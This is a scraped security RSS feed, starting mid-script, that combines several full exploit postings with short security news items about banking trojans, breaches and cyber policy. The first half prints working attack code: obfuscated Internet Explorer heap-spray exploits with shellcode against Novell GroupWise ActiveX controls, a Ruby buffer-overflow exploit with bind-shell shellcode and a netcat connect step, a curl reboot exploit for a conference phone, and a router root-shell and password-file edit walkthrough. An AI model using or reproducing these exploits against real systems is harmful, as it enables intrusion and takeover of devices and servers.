"Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); var count = (count ? count : 1); for (var i = 0; i < count; i++) this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ"); this.K("WbjLbPsZ"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); return this.heapBase + 0x688 + ((size+8)/8)*48; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) { var size = (size ? size : 1008); if ((size & 0xf) != 0) throw "Vtable size " + size + " must be a multiple of 16"; if (shellcode.length*2 > size-138) throw("Maximum shellcode length is " + (size-138) + " bytes"); var udIUhjCc = unescape("%u9090%u7ceb") for (var i = 0; i < 124/4; i++) udIUhjCc += this.RBRfbU(jmpecx); udIUhjCc += unescape("%u0028%u0028") + shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length); return udIUhjCc; } var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000); var pop_calc = unescape( "%u0c0c%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac" + "%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58" + "%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12" + "%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80" + "%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" + ""); var or_slide = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c"); var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090"); while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM; offset_length = 0x5F6; junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length); var shellcode = junk_offset + or_slide + pop_calc + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - pop_calc.length - junk_offset.length - or_slide.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(2, 0x40000 - 0x21); for (var i=0; i < 250; i++) { heap_obj.uYiBaSLpjlOJJdhFAb(block); } ctrl.SecManageRecipientCertificates(202116108) </script>

==> Novell GroupWise 12.0 InvokeContact method Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss <!-- (c)oded by High-Tech Bridge Security Research Lab --> <!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled --> <html> <Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title> <object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object> <script language='javascript'> function GyGguPonxZoADbtgXPS() { } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) { this.maxAlloc = (maxAlloc ? maxAlloc : 65535); this.heapBase = (heapBase ? heapBase : 0x150000); this.KJZFzfumaV = "AAAA"; while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) { this.KJZFzfumaV += this.KJZFzfumaV; } this.mem = new Array(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) { void(Math.atan2(0xbabe, msg)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) { if (enable == true) void(Math.atan(0xbabe)); else void(Math.asin(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) { void(Math.acos(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) { if (len > this.KJZFzfumaV.length) throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available"; return this.KJZFzfumaV.substr(0, len); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) { if (UWzqrDQwReXOllGssMYEzruQtomLp == 0) throw "Round argument cannot be 0"; return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width) { var digits = "0123456789ABCDEF"; var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1); while (num > 0xF) { num = num >>> 4; beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg; } var width = (width ? width : 0); while (beTBwoiJGBBhwyZg.length < width) beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg; return beTBwoiJGBBhwyZg; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) { return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (this.mem[tag] === undefined) this.mem[tag] = new Array(); if (typeof arg == "string" || arg instanceof String) { this.mem[tag].push(arg.substr(0, arg.length)); } else { this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2)); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) { delete this.mem[tag]; CollectGarbage(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() { this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache"); this.SWc("oleaut32"); for (var i = 0; i < 6; i++) { this.nPdkLCpaz(32, "oleaut32"); this.nPdkLCpaz(64, "oleaut32"); this.nPdkLCpaz(256, "oleaut32"); this.nPdkLCpaz(32768, "oleaut32"); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if (size == 32 || size == 64 || size == 256 || size == 32768) throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache"; this.nPdkLCpaz(arg, tag); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) { this.SWc(tag); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() { this.mNhbOXqosTNKjGhfj("Running the garbage collector"); CollectGarbage(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) { var count = (count ? count : 1); for (var i = 0; i < count; i++) { this.uYiBaSLpjlOJJdhFAb(arg); this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR"); } this.uYiBaSLpjlOJJdhFAb(arg); this.K("ZsJjplNR"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); var count = (count ? count : 1); for (var i = 0; i < count; i++) this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ"); this.K("WbjLbPsZ"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); return this.heapBase + 0x688 + ((size+8)/8)*48; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) { var size = (size ? size : 1008); if ((size & 0xf) != 0) throw "Vtable size " + size + " must be a multiple of 16"; if (shellcode.length*2 > size-138) throw("Maximum shellcode length is " + (size-138) + " bytes"); var udIUhjCc = unescape("%u9090%u7ceb") for (var i = 0; i < 124/4; i++) udIUhjCc += this.RBRfbU(jmpecx); udIUhjCc += unescape("%u0028%u0028") + shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length); return udIUhjCc; } var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000); var payload2 = unescape( "%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" + "%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" + "%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" + "%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" + "%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" + "%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" + ""); var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090"); while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM; offset_length = 0x5F6; junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length); var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(2, 0x40000 - 0x21); for (var i=0; i < 250; i++) { heap_obj.uYiBaSLpjlOJJdhFAb(block); } ctrl.InvokeContact(202116108) </script>

==> KNet Web Server 1.04b - Buffer Overflow SEH Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/ruby # Exploit Title: KNet Web Server Buffer Overflow SEH # Date: 2013-03-27 # Exploit Author: Myo Soe, http://yehg.net/ # Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html # Version: KNet 1.04b # Tested on: Windows 7 require 'net/http' require 'uri' require 'socket' ############################################ # bind port 4444 sc_bind = "\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" + "\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" + "\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" + "\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" + "\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\x64" + "\x88\x2e\x08\xbb\x7c\x85\x13\xec\x2c\x92\x5c\x14\x47\xfc" + "\x7c\x25\x84\x1e\x40\x6c\xa1\xd5\x32\x6f\x63\x24\xba\x41" + "\x4b\xeb\x85\x6d\x46\xf5\xc2\x4a\xb8\x80\x38\xa9\x45\x93" + "\xfa\xd3\x91\x16\x1f\x73\x52\x80\xfb\x85\xb7\x57\x8f\x8a" + "\x7c\x13\xd7\x8e\x83\xf0\x63\xaa\x08\xf7\xa3\x3a\x4a\xdc" + "\x67\x66\x09\x7d\x31\xc2\xfc\x82\x21\xaa\xa1\x26\x29\x59" + "\xb6\x51\x70\x36\x7b\x6c\x8b\xc6\x13\xe7\xf8\xf4\xbc\x53" + "\x97\xb4\x35\x7a\x60\xba\x6c\x3a\xfe\x45\x8e\x3b\xd6\x81" + "\xda\x6b\x40\x23\x62\xe0\x90\xcc\xb7\xa7\xc0\x62\x67\x08" + "\xb1\xc2\xd7\xe0\xdb\xcc\x08\x10\xe4\x06\x3f\x16\x2a\x72" + "\x6c\xf1\x4f\x84\x83\x5d\xd9\x62\xc9\x4d\x8f\x3d\x65\xac" + "\xf4\xf5\x12\xcf\xde\xa9\x8b\x47\x56\xa4\x0b\x67\x67\xe2" + "\x38\xc4\xcf\x65\xca\x06\xd4\x94\xcd\x02\x7c\xde\xf6\xc5" + "\xf6\x8e\xb5\x74\x06\x9b\x2d\x14\x95\x40\xad\x53\x86\xde" + "\xfa\x34\x78\x17\x6e\xa9\x23\x81\x8c\x30\xb5\xea\x14\xef" + "\x06\xf4\x95\x62\x32\xd2\x85\xba\xbb\x5e\xf1\x12\xea\x08" + "\xaf\xd4\x44\xfb\x19\x8f\x3b\x55\xcd\x56\x70\x66\x8b\x56" + "\x5d\x10\x73\xe6\x08\x65\x8c\xc7\xdc\x61\xf5\x35\x7d\x8d" + "\x2c\xfe\x8d\xc4\x6c\x57\x06\x81\xe5\xe5\x4b\x32\xd0\x2a" + "\x72\xb1\xd0\xd2\x81\xa9\x91\xd7\xce\x6d\x4a\xaa\x5f\x18" + "\x6c\x19\x5f\x09" ########################################### sploit = "\x90" * 1234 sploit += "\xFF\x64\x24\x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C sploit += "\xE3\x74\x24\x6C" # seh | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll] sploit += "\x90" * 80 sploit += sc_bind sploit += "\x90" * 80 ######################################## puts "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n" target = ARGV[0] def exploit(t,s) target = 'http://' + t sploit = s puts "[*] Sending exploit to #{target}...\n" url = URI.parse(target) res = Net::HTTP.start(url.host, url.port) {|http| http.get('/' + sploit) } end def connect(t) sleep(1) target = t puts "[*] Opening Shell ..\n\n"; system("nc #{target} 4444") end t1=Thread.new{exploit(target,sploit)} t2=Thread.new{connect(target)} t1.join t2.join

==> Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/bin/bash # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit # # by Todor Donev / 03.2013 / Sofia,Bulgaria # email: todor dot donev at gmail com # type: hardware # # The Konftel 300IP is a flexible SIP-based conference phone, # perfect for companies that use IP voice services. Its clear, # natural sound comes from OmniSound HD, Konftels patented # wideband audio technology. The stylishly designed # Konftel 300IP is packed with intelligent features for more # efficient conference calls. Record and store meetings on a # SD memory card. Use the conference guide to call # pre-programmed groups with just a few simple pushes of a # button. Conveniently import and export contact details via # the Web interface. Create your own phone book with the # personal user profile feature. The Konftel 300IP is also # ideal for larger conferences since it can accommodate # expansion microphones, an external wireless headset and a # PA system. With the Konftel 300IP your company will have # a conference phone that combines all the benefits of IP # voice service with innovative new features. # # Example usage: # [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180 # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit # Rebooting 192.168.1.180.. # Sleeping 30 secs, before rebooting # curl: (7) couldn't connect to host # # Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends! if [ $# != 1 ]; then echo "usg: $0 <victim>" exit; fi echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit" echo "Rebooting $1.." curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null echo "Sleeping 30 secs before rebooting" sleep 30 curl $1

==> Draytek Vigor 3900 1.06 - Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: Previlege escalation # Date: 19/3/2013 # Exploit Author: Mohammad abou hayt # Vendor Homepage: http://www.draytek.com.tw/index.php?option=com_k2&view=item&layout=item&id=2627&Itemid=593&lang=en # Software Link: N/A # Version: Vigor 3900 -Hardware V2 - firmware latest 1.06 ########################Privilege escalation for draytek vigor 3900##################### ########################Affected device Description:##################################### Vigor 3900 Router Firewall : High Performance Multi-WAN VPN Appliance The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performance applications including remote access, firewalling, load-balancing and failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive features set. ########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency. ############################Advisory:################################################### #The finding started when creating a normal limited user or any user to access the firewall dashboard. ##Having the port 22 open by default, try to login the firewall using putty with this limited user credentials login as: test test@192.168.0.1 password: **************************************** * * * Welcome V3900 * * * **************************************** Welcome it is Thu Mar 28 18:58:31 UTC 2013 Vigor3900> ###vigor 3900 is built in BusyBox : Trying to shell the device by using “sh draytekv3900” will gain root shell without asking for credintial . ####And what I have noticed that any user you create from the dashboard will be able to access the root shell whereas . Vigor3900> sh draytekv3900 BusyBox v1.4.2 (2013-02-25 23:52:19 CST) Built-in shell (ash) Enter 'help' for a list of built-in commands. #####Printing the cat /etc/passwd ~ # cat /etc/passwd root:!:0:0:root:/tmp:/bin/ash nobody:*:65534:65534:nobody:/var:/bin/false admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish quagga:x:51:51:quagga:/tmp/.quagga:/bin/false test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish #######Adding another admin (admin1) ~ # vi /etc/passwd root:!:0:0:root:/tmp:/bin/ash nobody:*:65534:65534:nobody:/var:/bin/false admin:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish operator:$1$.FTn64sr$3tKZ2599RrSU9TA.C/vKd0:501:501:operator:/usr:/bin/clish quagga:x:51:51:quagga:/tmp/.quagga:/bin/false admin1:$1$1xUkNSXm$SFvMVQCzcM3LmK9mrJmux0:500:500:admin:/tmp:/usr/bin/clish test:$1$qHVw8Ap.BnYm7jd5VYqBSo0:502:502:Linux User,,,:/tmp:/usr/bin/clish ~:wq
Discovered and written by: Mohammad Abou Hayt

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA.

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said.

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials.

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity.

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group.

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victims bank account.

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions.

==> Possible breach of DHS employee data has an unusual twist

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://gcn.com/articles/2013/06/03/dhs-data-breach-employee-info.aspx By William Jackson GCN.com Jun 03, 2013 The Homeland Security Department has notified some employees that personally identifiable information used for security clearances and stored in a third-party database could have been exposed to unauthorized users. The notifications came after DHS was alerted to a vulnerability in the vendor software by a law enforcement...

==> iPhones can apparently be hacked with malicious charger

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://news.cnet.com/8301-13579_3-57587482-37/iphones-can-apparently-be-hacked-with-malicious-charger/ By Dara Kerr CNET News June 3, 2013 Most people have heard of malicious software as a way to hack into an iPhone, but what about a malicious charger? Three researchers with the Georgia Institute of Technology, say they have come up with a proof-of-concept malicious iPhone charger that lets them hack into the mobile device running the...

==> Oracle Promises Enterprise Java Security Tweaks

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.informationweek.com/security/application-security/oracle-promises-enterprise-java-security/240155912 By Mathew J. Schwartz InformationWeek.com June 03, 2013 Java security memo to enterprise IT managers: Better distributed client control capabilities, locked down Java servers and certificate-based controls are coming. Those three upcoming Java security changes were outlined in "Maintaining the security-worthiness of Java is...

==> U.S. publishes details of missile base Israel wanted kept secret

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.mcclatchydc.com/2013/06/03/192895/us-publishes-details-of-missile.html By Sheera Frenkel McClatchy Foreign Staff June 3, 2013 TEL AVIV, Israel -- Israels military fumed Monday over the discovery that the U.S. government had revealed details of a top-secret Israeli military installation in published bid requests. The Obama administration had promised to build Israel a state-of-the-art facility to house a new ballistic-missile...

==> Army releases new leaders' handbook on cybersecurity

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 04 http://www.army.mil/article/103799/Army_releases_new_leaders__handbook_on_cybersecurity/ By Army CIO/G-6 June 3, 2013 WASHINGTON (June 3, 2013) -- The Army published a new handbook this month to provide leaders of all levels with the information and tools needed to address today's cybersecurity challenges, and to ensure organizations adopt the necessary practices to protect their information and the Army network. "We must change...

==> ASIO hacking failed, officials say

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.canberratimes.com.au/it-pro/security-it/asio-hacking-failed-officials-say-20130531-2nhgk.html By Philip Dorling The Canberra Times June 1, 2013 Australian national security officials have denied classified plans of ASIO's new headquarters building were stolen by Chinese hackers and say the opposition was informed of this in a security briefing. According to security officials, there were attempted cyber intrusions against...

==> Lawmakers press Obama to get tough with China on cyber espionage

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://thehill.com/blogs/hillicon-valley/technology/302885-lawmakers-to-obama-get-tough-with-china-on-hacking By Jennifer Martinez Hillicon Valley 06/02/13 Congressional pressure is mounting for President Obama to talk tough this week to his Chinese counterpart Xi Jinping on cybersecurity. House Intelligence Chairman Mike Rogers (R-Mich.) is calling on Obama to explicitly warn the Chinese president that cyberattacks waged by the...

==> Hacking The TDoS Attack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.darkreading.com/attacks-breaches/hacking-the-tdos-attack/240155809 By Kelly Jackson Higgins Dark Reading May 30, 2013 When an ICU nurse refused to pay scammers who insisted she owed money for a payday loan, they unleashed a robo-dial flood of hundreds of calls per hour that ultimately shut down the phone system of the hospital's intensive care unit. In another case, supporters of a popular company that received a negative...

==> E-vil empire: USSR's old domain space is increasingly attractive hideout for hackers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://www.canada.com/entertainment/Evil+empire+USSRs+domain+space+increasingly+attractive+hideout/8459435/story.html BY RAPHAEL SATTER THE ASSOCIATED PRESS MAY 31, 2013 MOSCOW - The Soviet Union disappeared from the map more than two decades ago. But online an 'e-vil empire' is thriving. Security experts say the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct...

==> NATO's Next War -- in Cyberspace

http://seclists.org/rss/isn.rss Posted by InfoSec News on Jun 03 http://online.wsj.com/article/SB10001424127887323855804578508894129031084.html By ANDERS FOGH RASMUSSEN The Wall Street Journal June 2, 2013 On April 23, the Dow Jones Industrial Average dropped by 150 points within seven minutes, destroying billions of dollars in value. The reason was a message on the Associated Press's Twitter account claiming that two explosions had shaken the White House. The tweet was quickly exposed as bogus, the...

==> Indonesia to create its own "cyber army"

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://news.xinhuanet.com/english/world/2013-05/29/c_132416837.htm By Abu Hanifah English.news.cn 2013-05-29 JAKARTA, May 29 (Xinhua) -- In a move to keep the country's sovereignty in the cyber age, the Indonesian defense ministry is planning to create a special force called "cyber army" to tackle attacks by Internet hackers against the state's Internet portals and websites that could endanger the security of the state....

==> Hackers exploit Ruby on Rails vulnerability to compromise servers, create botnet

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://news.techworld.com/applications/3449583/hackers-exploit-ruby-on-rails-vulnerability-to-compromise-servers-create-botnet/ By Lucian Constantin Techworld.com 29 May 2013 Hackers are actively exploiting a critical vulnerability in the Ruby on Rails Web application development framework in order to compromise Web servers and create a botnet. The Ruby on Rails development team released a security patch for the vulnerability, which is...

==> NYPD cop arrested, accused of paying $4 ,000 to hack fellow officers’ e-mail

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://arstechnica.com/tech-policy/2013/05/nypd-cop-arrested-accused-of-paying-4000-to-hack-fellow-officers-e-mail/ By Cyrus Farivar Ars Technica May 29 2013 Its no surprise that many computer crimes have stupid criminals behind them. But its not every day that you have cops getting caught at their workplace. A New York City Police Department (NYPD) officer has been arrested and accused of paying more than $4,000 via Paypal for...

==> Drupal resets account passwords after detecting unauthorized access

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 https://www.computerworld.com/s/article/9239613/Drupal_resets_account_passwords_after_detecting_unauthorized_access By John Ribeiro IDG News Service May 29, 2013 Drupal.org has reset account passwords after it found unauthorized access to information on its servers. The access came through third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal, the open source content...

==> Liberty Reserve arrests are causing 'pain' to criminals

http://seclists.org/rss/isn.rss Posted by InfoSec News on May 30 http://www.bbc.co.uk/news/technology-22699871 By Leo Kelion Technology reporter BBC News 29 May 2013 The takedown of the Liberty Reserve digital cash exchange has caused "pain" to criminals who used the facility, according to a leading security expert. Brian Krebs said he had seen comments on crime-linked restricted access forums suggesting many had suffered "steep losses". US prosecutors published an indictment against...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

